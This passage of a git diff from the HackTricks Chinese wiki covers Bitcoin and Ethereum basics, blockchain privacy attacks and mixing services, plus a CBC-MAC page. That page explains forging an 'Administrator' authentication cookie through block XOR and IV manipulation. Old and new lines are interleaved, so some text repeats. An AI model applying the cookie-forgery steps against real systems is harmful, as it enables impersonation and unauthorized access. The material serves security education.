||||
|
||||
在比特币中生成数字签名的第一部分可以用以下数学方式表示:\
|
||||
_**Sig**_ = _**Fsig**_(_**Fhash**_(_**m**_),_**dA**_)
|
||||
|
||||
其中:
|
||||
|
||||
* \_d\_A是签名**私钥**
|
||||
* _m_是**交易**
|
||||
* Fhash是哈希函数
|
||||
* Fsig是签名算法
|
||||
* Sig是生成的签名
|
||||
|
||||
签名函数(Fsig)生成一个包含两个值R和S的签名:
|
||||
|
||||
* Sig = (R, S)
|
||||
|
||||
一旦计算出R和S,它们将被序列化为一个字节流,然后使用称为Distinguished Encoding Rules(DER)的国际标准编码方案进行编码。为了验证签名的有效性,将使用签名验证算法。验证数字签名需要以下内容:
|
||||
|
||||
* 签名(R和S)
|
||||
* 交易哈希
|
||||
* 与用于创建交易签名的私钥对应的公钥
|
||||
|
||||
签名验证算法有效地意味着只有私钥的所有者(生成公钥的私钥)才能在交易上生成签名。如果签名有效,则签名验证算法将返回“TRUE”。
|
||||
|
||||
### 多重签名交易
|
||||
|
||||
多重签名**地址**是与多个ECDSA私钥关联的地址。最简单的类型是m-of-n地址 - 它与n个私钥关联,并且从该地址发送比特币需要至少m个密钥的签名。多重签名**交易**是从多重签名地址发送资金的交易。
|
||||
|
||||
### 交易字段
|
||||
|
||||
每个比特币交易都有几个字段:
|
||||
|
||||
* **输入**:**比特币**从哪个地址**转移**
|
||||
* **输出**:转移到**每个**输出的地址和金额
|
||||
* **费用**:支付给交易矿工的金额
|
||||
* **Script\_sig**:交易的脚本签名
|
||||
* **Script\_type**:交易类型
|
||||
|
||||
有**2种主要类型**的交易:
|
||||
|
||||
* **P2PKH:“支付到公钥哈希”**:这是交易的执行方式。您要求**发送方**提供有效的**签名**(来自私钥)和**公钥**。交易输出脚本将使用签名和公钥,并通过一些加密函数检查**是否与公钥哈希匹配**,如果匹配,则**资金**将是**可支配的**。这种方法将公钥以哈希形式隐藏,以提供额外的安全性。
|
||||
* **P2SH:“支付到脚本哈希”**:交易的输出只是**脚本**(这意味着想要这笔钱的人发送一个脚本),如果**使用特定参数执行将导致布尔值为`true`或`false`**。如果矿工使用提供的参数运行输出脚本并结果为`true`,则**资金将发送到您想要的输出**。`P2SH`用于**多重签名**钱包,使输出脚本成为**在接受交易之前检查多个签名的逻辑**。`P2SH`也可用于允许任何人或没有人花费资金。如果P2SH交易的输出脚本只是`1`表示为true,则尝试在不提供参数的情况下花费输出将导致`1`,使尝试花费资金的任何人都可以花费。这也适用于返回`0`的脚本,使输出对任何人都不可花费。
|
||||
|
||||
## 闪电网络
|
||||
|
||||
该协议有助于**向通道执行多个交易**,并**仅**将**最终状态**发送到区块链以保存。\
|
||||
这**提高了**比特币区块链的**速度**(每秒仅允许7笔支付),并允许创建**更难追踪的交易**,因为通道是通过比特币区块链的节点创建的:
|
||||
|
||||
![](<../../.gitbook/assets/image (611).png>)
|
||||
|
||||
闪电网络的正常使用包括通过向相关基础区块链(第1层)承诺资金交易来**打开支付通道**,然后进行**任意数量**的闪电网络**交易**,更新通道资金的暂定分配**而无需将其广播到区块链**,最后通过**广播**解决交易的**最终版本**来关闭支付通道以分配通道资金。
|
||||
|
||||
请注意,通道的任一成员都可以随时停止并将通道的最终状态发送到区块链。
|
||||
|
||||
# 比特币隐私攻击
|
||||
|
||||
## 共同输入
|
||||
|
||||
理论上,一笔交易的输入可以属于不同的用户,但实际上这是不常见的,因为这需要额外的步骤。因此,很多时候可以假定**同一笔交易中的2个输入地址属于同一所有者**。
|
||||
|
||||
## UTXO找零地址检测
|
||||
|
||||
**UTXO**表示**未花费的交易输出**(UTXOs)。在使用来自先前交易的输出作为输入的交易中,**整个输出需要被花费**(以避免双重花费攻击)。因此,如果意图是仅**发送**该输出的一部分资金到一个地址并**保留**另一部分资金,将会出现**2个不同的输出**:预期的输出和一个**随机新的找零地址**,剩余资金将保存在其中。
|
||||
|
||||
然后,观察者可以假设**生成的新找零地址属于UTXO的所有者**。
|
||||
|
||||
## 社交网络和论坛
|
||||
|
||||
一些人在互联网上的不同网站上提供有关他们比特币地址的数据。**这使得很容易识别地址的所有者**。
|
||||
|
||||
## 交易图
|
||||
|
||||
通过以图形方式表示交易,**有可能以一定概率知道账户资金的去向**。因此,可以了解与**区块链中相关的用户**的一些信息。
|
||||
|
||||
## **不必要的输入启发式**
|
||||
|
||||
也称为“最佳找零启发式”。考虑这笔比特币交易。它有两个价值分别为2 BTC和3 BTC的输入以及价值为4 BTC和1 BTC的两个输出。
|
||||
```
|
||||
2 btc --> 4 btc
|
||||
3 btc 1 btc
|
||||
```
|
||||
假设其中一个输出是找零,另一个输出是支付。有两种解释:支付输出要么是4 BTC输出,要么是1 BTC输出。但如果1 BTC输出是支付金额,那么3 BTC输入就是不必要的,因为钱包本可以只花费2 BTC输入并支付更低的矿工费用。这表明真正的支付输出是4 BTC,而1 BTC是找零输出。
|
||||
|
||||
这对于具有多个输入的交易是一个问题。修复此泄漏的一种方法是添加更多输入,直到找零输出高于任何输入,例如:
|
||||
```
|
||||
2 btc --> 4 btc
|
||||
3 btc 6 btc
|
||||
5 btc
|
||||
```
|
||||
## 强制地址重用
|
||||
|
||||
**强制地址重用**或**激励地址重用**是指对已在区块链上使用过的地址支付(通常是小额)比特币的对手。对手希望用户或其钱包软件**将这些支付用作更大交易的输入,从而通过共同输入所有权**启发式揭示其他地址。这些支付可以被理解为一种迫使地址所有者无意中重用地址的方式。
|
||||
|
||||
这种攻击有时被错误地称为**尘埃攻击**。
|
||||
|
||||
钱包的正确行为是不要花费已经落入已使用空地址的硬币。
|
||||
|
||||
## 其他区块链分析
|
||||
|
||||
* **确切的支付金额**:为了避免带有找零的交易,支付需要等于UTXO(这是非常不寻常的)。因此,**没有找零地址的交易可能是同一用户之间的转账**。
|
||||
* **整数金额**:在交易中,如果输出之一是“**整数金额**”,那么很可能这是**支付给将该“整数金额”作为价格的人**,因此另一部分必须是剩余部分。
|
||||
* **钱包指纹识别**:仔细的分析师有时可以推断出哪个软件创建了某个交易,因为**许多不同的钱包软件并不总是以完全相同的方式创建交易**。钱包指纹识别可用于检测找零输出,因为找零输出是使用相同钱包指纹花费的输出。
|
||||
* **金额和时间相关性**:如果执行交易的人**披露**了交易的**时间**和/或**金额**,那么这很容易**被发现**。
|
||||
|
||||
## 流量分析
|
||||
|
||||
一些组织**窃听您的流量**可能会看到您在比特币网络中通信。\
|
||||
如果对手看到一个交易或区块**从您的节点发出而之前没有进入**,那么几乎可以确定**该交易是由您进行的或该区块是由您挖掘的**。由于涉及互联网连接,对手将能够**将IP地址与发现的比特币信息联系起来**。
|
||||
|
||||
无法窃听所有互联网流量但拥有**大量比特币节点**以便**更接近**源的攻击者可能能够知道宣布交易或区块的IP地址。\
|
||||
此外,一些钱包定期重新广播其未确认的交易,以便更有可能通过网络广泛传播并被挖掘。
|
||||
|
||||
## 其他攻击以查找地址所有者信息
|
||||
|
||||
有关更多攻击,请阅读[https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy)
|
||||
|
||||
# 匿名比特币
|
||||
隐私攻击,如 **共同输入所有权** 和 **UTXO 更改地址检测**,利用交易模式。像 **混币** 和 **CoinJoin** 这样的策略通过模糊用户之间的交易链接来提高匿名性。
|
||||
|
||||
## 匿名获取比特币
|
||||
|
||||
* **现金交易**:使用现金购买比特币。
|
||||
* **现金替代品**:购买礼品卡或类似物品,并在线交换它们为比特币。
|
||||
* **挖矿**:挖矿是获取比特币最匿名的方式。这适用于独立挖矿,因为[挖矿池](https://en.bitcoin.it/wiki/Pooled\_mining)通常知道哈希者的IP地址。
|
||||
* **盗窃**:理论上,另一种获取匿名比特币的方式是窃取它们。
|
||||
方法包括现金交易、挖矿和使用混币。**CoinJoin** 将多个交易混合在一起以增加追踪难度,而 **PayJoin** 将 CoinJoin 伪装成常规交易以提高隐私性。
|
||||
```bash
|
||||
2 btc --> 4 btc
|
||||
3 btc 1 btc
|
||||
```
|
||||
## **强制地址重用**
|
||||
|
||||
攻击者可能向先前使用过的地址发送小额金额,希望接收方将这些金额与将来的其他输入合并在一起进行交易,从而将地址关联起来。
|
||||
|
||||
### 正确的钱包行为
|
||||
钱包应避免使用已经使用过的空地址收到的硬币,以防止这种隐私泄漏。
|
||||
|
||||
## **其他区块链分析技术**
|
||||
|
||||
- **确切的支付金额:** 没有找零的交易很可能是同一用户拥有的两个地址之间的交易。
|
||||
- **整数金额:** 交易中的整数金额表明这是一笔付款,而非整数输出很可能是找零。
|
||||
- **钱包指纹识别:** 不同的钱包具有独特的交易创建模式,允许分析人员识别所使用的软件,可能还有找零地址。
|
||||
- **金额和时间相关性:** 披露交易时间或金额可能使交易可追踪。
|
||||
|
||||
## **流量分析**
|
||||
|
||||
通过监视网络流量,攻击者可能将交易或区块与 IP 地址关联起来,危及用户隐私。如果一个实体运行许多比特币节点,尤其是真实,这一点尤为真实,增强了他们监视交易的能力。
|
||||
|
||||
## 更多
|
||||
有关隐私攻击和防御的全面列表,请访问[比特币维基上的比特币隐私](https://en.bitcoin.it/wiki/Privacy)。
|
||||
|
||||
# 匿名比特币交易
|
||||
|
||||
## 匿名获取比特币的方法
|
||||
|
||||
- **现金交易:** 通过现金获取比特币。
|
||||
- **现金替代品:** 购买礼品卡并在线兑换比特币。
|
||||
- **挖矿:** 通过挖矿赚取比特币是最私密的方法,尤其是在独自进行挖矿时,因为挖矿池可能知道矿工的 IP 地址。[挖矿池信息](https://en.bitcoin.it/wiki/Pooled_mining)
|
||||
- **盗窃:** 理论上,窃取比特币可能是另一种匿名获取比特币的方法,尽管这是非法的,不建议这样做。
|
||||
|
||||
## 混币服务
|
||||
|
||||
用户会**将比特币发送到混币服务**,服务会**发送不同的比特币回给用户**,扣除一定费用。理论上,观察区块链的对手将**无法将**进入和离开的交易**联系起来**。
|
||||
|
||||
然而,用户需要信任混币服务将比特币退还,并且不会保存有关接收和发送资金之间关系的日志。\
|
||||
还可以使用其他服务作为混币服务,例如比特币赌场,您可以在那里发送比特币,稍后取回。
|
||||
通过使用混币服务,用户可以**发送比特币**并收到**不同的比特币作为回报**,这使得追踪原始所有者变得困难。然而,这需要对服务的信任,不要保留日志并确实归还比特币。替代混币选项包括比特币赌场。
|
||||
|
||||
## CoinJoin
|
||||
|
||||
**CoinJoin**将**不同用户的多个交易混合成一个**,以使观察者更难找出**哪个输入与哪个输出相关**。\
|
||||
这提供了新的隐私级别,但是,**某些** **交易**,其中某些输入和输出金额相关或与其他输入和输出非常不同**仍然可以被外部观察者关联**。
|
||||
**CoinJoin**将来自不同用户的多个交易合并为一笔交易,使试图将输入与输出匹配的人的过程变得复杂。尽管其有效性,具有独特输入和输出大小的交易仍可能被追踪。
|
||||
|
||||
比特币区块链上可能的CoinJoin交易ID示例为`402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a`和`85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`。
|
||||
可能使用了CoinJoin的示例交易包括`402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a`和`85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`。
|
||||
|
||||
[**https://coinjoin.io/en**](https://coinjoin.io/en)\
|
||||
**类似于CoinJoin但更好,对于以太坊,您可以使用** [**Tornado Cash**](https://tornado.cash) **(资金来自矿工,因此它只会出现在您的钱包中)。**
|
||||
有关更多信息,请访问[CoinJoin](https://coinjoin.io/en)。对于以太坊上类似的服务,请查看[Tornado Cash](https://tornado.cash),该服务使用矿工资金匿名化交易。
|
||||
|
||||
## PayJoin
|
||||
|
||||
在前一节讨论的CoinJoin类型可以通过检查具有相同价值的多个输出来轻松识别。
|
||||
|
||||
PayJoin(也称为支付到终点或P2EP)是两方之间的一种特殊类型的CoinJoin,其中一方支付另一方。然后,交易**没有具有相同价值的多个输出**,因此不会明显显示为具有相同输出的CoinJoin。考虑这个交易:
|
||||
```
|
||||
作为CoinJoin的变体,**PayJoin**(或P2EP)将交易伪装成两个当事人(例如,客户和商家)之间的常规交易,而不具有CoinJoin特有的等额输出特征。这使得它极其难以检测,并且可能使交易监视实体使用的共同输入所有权启发式失效。
|
||||
```plaintext
|
||||
2 btc --> 3 btc
|
||||
5 btc 4 btc
|
||||
```
|
||||
# 比特币隐私良好实践
|
||||
## **加密货币中的隐私最佳实践**
|
||||
|
||||
## 钱包同步
|
||||
### **钱包同步技术**
|
||||
|
||||
比特币钱包必须以某种方式获取有关其余额和历史记录的信息。截至2018年底,最实用和私密的现有解决方案是使用**完整节点钱包**(最大程度上保护隐私)和**客户端端区块过滤**(非常好)。
|
||||
为了维护隐私和安全,与区块链同步钱包至关重要。有两种突出的方法:
|
||||
|
||||
- **完整节点:** 完整节点下载包含比特币上发生的每笔[交易](https://en.bitcoin.it/wiki/Transaction)的整个区块链。因此,监视用户的互联网连接的对手将无法了解用户感兴趣的交易或地址。
|
||||
- **客户端端区块过滤:** 客户端端区块过滤通过创建包含每个区块中每笔交易的所有地址的**过滤器**来工作。这些过滤器可以测试一个**元素是否在集合中**;虽然可能存在误报,但不存在漏报。轻量级钱包会**下载**区块链中每个**区块**的所有过滤器,并检查其**自己的地址**是否匹配。包含匹配项的区块将从点对点网络中完整下载,并且这些区块将用于获取钱包的历史记录和当前余额。
|
||||
- **完整节点**:通过下载整个区块链,完整节点确保最大隐私性。所有历史交易都存储在本地,使对手无法识别用户感兴趣的交易或地址。
|
||||
- **客户端端区块过滤**:该方法涉及为区块链中的每个区块创建过滤器,允许钱包识别相关交易而不向网络观察者公开特定兴趣。轻量级钱包下载这些过滤器,仅在找到与用户地址匹配的完整区块时才获取完整区块。
|
||||
|
||||
## Tor
|
||||
### **利用 Tor 实现匿名性**
|
||||
|
||||
比特币网络使用点对点网络,这意味着其他节点可以了解您的IP地址。因此,建议您**每次与比特币网络交互时都通过Tor连接**。
|
||||
鉴于比特币在点对点网络上运行,建议使用 Tor 来掩盖您的 IP 地址,在与网络交互时增强隐私。
|
||||
|
||||
## 避免地址重复使用
|
||||
### **防止地址重复使用**
|
||||
|
||||
**地址被多次使用对隐私非常有害,因为它将更多的区块链交易链接在一起,并证明它们是由同一实体创建的**。使用比特币的最私密和安全的方式是向每个付款人发送一个全新的地址。收到的硬币花费后,该地址不应再次使用。此外,在发送比特币时应要求一个全新的比特币地址。所有良好的比特币钱包都有一个用户界面,以防止地址重复使用。
|
||||
为了保护隐私,每次交易都使用新地址至关重要。重复使用地址可能通过将交易与同一实体关联来损害隐私。现代钱包通过设计阻止地址重复使用。
|
||||
|
||||
## 多笔交易
|
||||
### **交易隐私策略**
|
||||
|
||||
用**多笔链上交易**支付某人可以大大降低基于金额的隐私攻击的威力,例如金额相关性和整数金额。例如,如果用户想向某人支付5 BTC,并且不希望5 BTC的价值很容易被搜索到,那么他们可以发送两笔价值分别为2 BTC和3 BTC的交易,总共为5 BTC。
|
||||
- **多笔交易**:将支付拆分为多笔交易可以模糊交易金额,阻止隐私攻击。
|
||||
- **避免找零**:选择不需要找零输出的交易可通过破坏找零检测方法来增强隐私。
|
||||
- **多个找零输出**:如果避免找零不可行,生成多个找零输出仍可提高隐私性。
|
||||
|
||||
## 避免找零
|
||||
# **门罗币:匿名的灯塔**
|
||||
|
||||
避免找零是指仔细选择交易输入和输出,以完全不需要找零输出。**没有找零输出对隐私非常有利**,因为它破坏了找零检测启发式。
|
||||
门罗币满足了数字交易中绝对匿名的需求,为隐私设定了高标准。
|
||||
|
||||
## 多个找零输出
|
||||
# **以太坊:Gas 和交易**
|
||||
|
||||
如果避免找零不可行,则**创建多个找零输出可以提高隐私**。这也会破坏通常假定只有一个找零输出的找零检测启发式。由于此方法使用的区块空间比通常多,因此避免找零更可取。
|
||||
### **理解 Gas**
|
||||
|
||||
# 门罗币
|
||||
Gas 衡量在以太坊上执行操作所需的计算工作量,以 **gwei** 定价。例如,一笔花费 2,310,000 gwei(或 0.00231 ETH)的交易涉及 gas 限制、基本费用和激励矿工的小费。用户可以设置最大费用以确保不过度支付,多余部分将退还。
|
||||
|
||||
当门罗币开发时,它试图解决的迫切需求是**完全匿名**,在很大程度上,它填补了这一空白。
|
||||
### **执行交易**
|
||||
|
||||
# 以太坊
|
||||
以太坊中的交易涉及发送方和接收方,可以是用户或智能合约地址。它们需要支付费用并且必须被挖掘。交易中的基本信息包括接收方、发送方签名、价值、可选数据、gas 限制和费用。值得注意的是,发送方地址是从签名中推断出来的,因此在交易数据中不需要它。
|
||||
|
||||
## Gas
|
||||
|
||||
Gas指的是衡量以太坊网络上执行特定操作所需的**计算工作量**的单位。Gas是成功进行以太坊**交易**所需的**费用**。
|
||||
|
||||
Gas价格以**gwei**表示,gwei本身是ETH的一个单位 - 每个gwei等于**0.000000001 ETH**(10的-9次方ETH)。例如,您可以说您的gas费用为1 gwei,而不是说您的gas费用为0.000000001 ether。'gwei'这个词本身意味着'吉博-韦',它等于**1,000,000,000 wei**。Wei本身是**ETH的最小单位**。
|
||||
|
||||
要计算交易将花费的gas,请阅读以下示例:
|
||||
|
||||
假设Jordan必须向Taylor支付1 ETH。在交易中,gas限制为21,000单位,基本费用为100 gwei。Jordan还包括10 gwei的小费。
|
||||
|
||||
使用上述公式,我们可以计算为`21,000 * (100 + 10) = 2,310,000 gwei`或0.00231 ETH。
|
||||
|
||||
当Jordan发送资金时,将从Jordan的账户中扣除1.00231 ETH。Taylor将收到1.0000 ETH。矿工将获得0.00021 ETH的小费。基本费用0.0021 ETH被销毁。
|
||||
|
||||
此外,Jordan还可以为交易设置一个最大费用(`maxFeePerGas`)。实际费用与最大费用之间的差额将退还给Jordan,即`refund = max fee - (base fee + priority fee)`。Jordan可以设置一个最大支付交易执行的金额,并在交易执行时不必担心支付超出基本费用的费用。
|
||||
|
||||
由于基本费用是根据对区块空间的需求由网络计算的,因此最后一个参数:maxFeePerGas有助于控制将支付的最大费用。
|
||||
|
||||
## 交易
|
||||
|
||||
请注意,在**以太坊**网络中,交易是在2个地址之间执行的,这些地址可以是**用户或智能合约地址**。\
|
||||
**智能合约**通过**特殊**的**交易**存储在分布式分类账中。
|
||||
|
||||
改变EVM状态的交易需要广播到整个网络。任何节点都可以广播要求在EVM上执行交易;发生这种情况后,**矿工**将**执行**交易并将结果状态更改传播到网络的其余部分。\
|
||||
交易需要**费用**,必须进行挖矿才能变得有效。
|
||||
|
||||
提交的交易包括以下信息:
|
||||
|
||||
- `recipient` – 接收地址(如果是外部拥有的账户,则交易将转移价值。如果是合同账户,则交易将执行合同代码)
|
||||
- `signature` – 发件人的标识符。当发件人的私钥签署交易并确认发件人已授权此交易时,将生成此标识符
|
||||
- `value` – 从发件人转移到接收方的ETH金额(以WEI为单位,是ETH的一个单位)
|
||||
- `data` – 包含任意数据的可选字段
|
||||
- `gasLimit` – 交易可以消耗的最大gas单位数量。gas单位代表计算步骤
|
||||
- `maxPriorityFeePerGas` - 包含为矿工提供的小费的最大gas数量
|
||||
- `maxFeePerGas` - 为交易愿意支付的最大gas数量(包括`baseFeePerGas`和`maxPriorityFeePerGas`)
|
||||
|
||||
请注意,没有任何字段用于原始地址,这是因为这可以从签名中推断出来。
|
||||
这些实践和机制对于任何希望参与加密货币并优先考虑隐私和安全性的人都是基础性的。
|
||||
|
||||
## 参考资料
|
||||
|
||||
- [https://en.wikipedia.org/wiki/Proof\_of\_stake](https://en.wikipedia.org/wiki/Proof\_of\_stake)
|
||||
- [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/)
|
||||
- [https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions](https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions)
|
||||
- [https://ethereum.org/en/developers/docs/transactions/](https://ethereum.org/en/developers/docs/transactions/)
|
||||
- [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/)
|
||||
- [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced\_address\_reuse)
|
||||
* [https://en.wikipedia.org/wiki/Proof\_of\_stake](https://en.wikipedia.org/wiki/Proof\_of\_stake)
|
||||
* [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/)
|
||||
* [https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions](https://bitcoin.stackexchange.com/questions/3718/what-are-multi-signature-transactions)
|
||||
* [https://ethereum.org/en/developers/docs/transactions/](https://ethereum.org/en/developers/docs/transactions/)
|
||||
* [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/)
|
||||
* [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced\_address\_reuse)
|
||||
|
|
|
@ -1,16 +1,17 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# CBC
|
||||
|
@ -19,21 +20,21 @@
|
|||
|
||||
# CBC-MAC
|
||||
|
||||
在密码学中,**密码块链接消息认证码**(**CBC-MAC**)是一种从块密码构造消息认证码的技术。消息使用某种块密码算法在CBC模式下加密,以创建一个**块链,使得每个块依赖于前一个块的正确加密**。这种相互依赖确保对**任何**明文**位**的更改将导致**最终加密块**以一种不能预测或抵消的方式发生**更改**,而不知道块密码的密钥。
|
||||
**密码块链接消息认证码**(**CBC-MAC**)是密码学中使用的一种方法。它通过逐块加密消息来工作,其中每个块的加密与前一个块相关联。这个过程创建了一个**块链**,确保即使更改原始消息的一个位,也会导致加密数据的最后一个块发生不可预测的变化。要进行或逆转这样的更改,需要加密密钥,确保安全性。
|
||||
|
||||
要计算消息m的CBC-MAC,需要使用零初始化向量在CBC模式下加密m并保留最后一个块。以下图示了使用秘密密钥k和块密码E计算消息包含块的CBC-MAC![m\_{1}\\|m\_{2}\\|\cdots \\|m\_{x}](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5)的计算过程:
|
||||
要计算消息 m 的 CBC-MAC,需要使用零初始化向量在 CBC 模式下加密 m 并保留最后一个块。以下图示了使用秘密密钥 k 和块密码 E 计算消息组成的块的 CBC-MAC 的计算过程![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5):
|
||||
|
||||
![CBC-MAC structure (en).svg](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png)
|
||||
![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png)
|
||||
|
||||
# 漏洞
|
||||
|
||||
使用CBC-MAC时,通常使用的**IV为0**。\
|
||||
这是一个问题,因为独立的2个已知消息(`m1`和`m2`)将生成2个签名(`s1`和`s2`)。因此:
|
||||
使用 CBC-MAC 时通常使用的**初始化向量为 0**。\
|
||||
这是一个问题,因为独立的 2 个已知消息(`m1` 和 `m2`)将生成 2 个签名(`s1` 和 `s2`)。因此:
|
||||
|
||||
* `E(m1 XOR 0) = s1`
|
||||
* `E(m2 XOR 0) = s2`
|
||||
|
||||
然后,由m1和m2连接而成的消息(m3)将生成2个签名(s31和s32):
|
||||
然后,由 m1 和 m2 连接而成的消息(m3)将生成 2 个签名(s31 和 s32):
|
||||
|
||||
* `E(m1 XOR 0) = s31 = s1`
|
||||
* `E(m2 XOR s1) = s32`
|
||||
|
@ -46,36 +47,37 @@
|
|||
* `rator\00\00\00`
|
||||
|
||||
您可以创建一个名为**Administ**(m1)的用户名并检索签名(s1)。\
|
||||
然后,您可以创建一个名为`rator\00\00\00 XOR s1`结果的用户名。这将生成`E(m2 XOR s1 XOR 0)`,即s32。\
|
||||
现在,您可以使用s32作为完整名称**Administrator**的签名。
|
||||
然后,您可以创建一个用户名,称为`rator\00\00\00 XOR s1`的结果。这将生成`E(m2 XOR s1 XOR 0)`,即 s32。\
|
||||
现在,您可以使用 s32 作为完整名称**Administrator**的签名。
|
||||
|
||||
### 总结
|
||||
|
||||
1. 获取用户名**Administ**(m1)的签名,即s1
|
||||
2. 获取用户名**rator\x00\x00\x00 XOR s1 XOR 0**的签名为s32**。**
|
||||
3. 将cookie设置为s32,它将成为用户**Administrator**的有效cookie。
|
||||
1. 获取用户名**Administ**(m1)的签名,即 s1
|
||||
2. 获取用户名**rator\x00\x00\x00 XOR s1 XOR 0**的签名为 s32**.**
|
||||
3. 将 cookie 设置为 s32,它将成为用户**Administrator**的有效 cookie。
|
||||
|
||||
# 攻击控制IV
|
||||
# 攻击控制 IV
|
||||
|
||||
如果您可以控制使用的IV,则攻击可能会变得非常容易。\
|
||||
如果cookie只是加密的用户名,要冒充用户"**administrator**",您可以创建用户"**Administrator**"并获取其cookie。\
|
||||
现在,如果您可以控制IV,您可以更改IV的第一个字节,使得**IV\[0] XOR "A" == IV'\[0] XOR "a"**,并重新生成用户**Administrator**的cookie。这个cookie将有效地**冒充**初始**IV**下的用户**administrator**。
|
||||
如果您可以控制使用的 IV,则攻击可能会变得非常容易。\
|
||||
如果 cookie 只是加密的用户名,要冒充用户"**administrator**",您可以创建用户"**Administrator**"并获取其 cookie。\
|
||||
现在,如果您可以控制 IV,您可以更改 IV 的第一个字节,使得**IV\[0] XOR "A" == IV'\[0] XOR "a"**,并重新生成用户**Administrator**的 cookie。这个 cookie 将有效地**冒充**初始**IV**的用户**administrator**。
|
||||
|
||||
# 参考
|
||||
## 参考
|
||||
|
||||
更多信息请参阅[https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC)
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
